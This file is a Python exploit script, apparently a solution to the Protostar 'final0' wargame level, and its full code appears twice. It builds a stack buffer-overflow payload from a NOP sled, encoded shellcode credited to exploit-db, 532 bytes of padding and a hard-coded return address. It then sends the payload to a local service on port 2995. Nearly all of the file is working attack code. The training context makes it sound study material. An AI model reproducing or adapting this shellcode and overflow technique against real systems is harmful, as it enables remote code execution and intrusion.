TheRealJunior/final0.py

## final0.py
import socket

# shellcode thanks to https://blackndoor.fr/protostar-final0/, https://www.exploit-db.com/exploits/13427/
shellcode = '\x90' * 150 + b"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5f\x81\xef\xdf\xff\xff\xff\x57\x5e\x29\xc9\x80\xc1\xb8\x8a\x07\x2c\x41\xc0\xe0\x04\x47\x02\x07\x2c\x41\x88\x06\x46\x47\x49\xe2\xedDBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKBAFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIAJDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJOBLAALMNIA"

csocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csocket.connect(('127.0.0.1', 2995))

# ret addr thanks to https://blackndoor.fr/protostar-final0/
ret_addr = b'\x60\xfa\xff\xbf'

print('shellcode len %d' % len(shellcode))

csocket.send(shellcode + b'a' * (532 - len(shellcode)) + ret_addr + '\n')
recv = csocket.recv(2048)
print(recv)
csocket.close()
	import socket

	# shellcode thanks to https://blackndoor.fr/protostar-final0/, https://www.exploit-db.com/exploits/13427/
	shellcode = '\x90' * 150 + b"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5f\x81\xef\xdf\xff\xff\xff\x57\x5e\x29\xc9\x80\xc1\xb8\x8a\x07\x2c\x41\xc0\xe0\x04\x47\x02\x07\x2c\x41\x88\x06\x46\x47\x49\xe2\xedDBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKBAFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIAJDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJOBLAALMNIA"

	csocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	csocket.connect(('127.0.0.1', 2995))

	# ret addr thanks to https://blackndoor.fr/protostar-final0/
	ret_addr = b'\x60\xfa\xff\xbf'

	print('shellcode len %d' % len(shellcode))

	csocket.send(shellcode + b'a' * (532 - len(shellcode)) + ret_addr + '\n')
	recv = csocket.recv(2048)
	print(recv)
	csocket.close()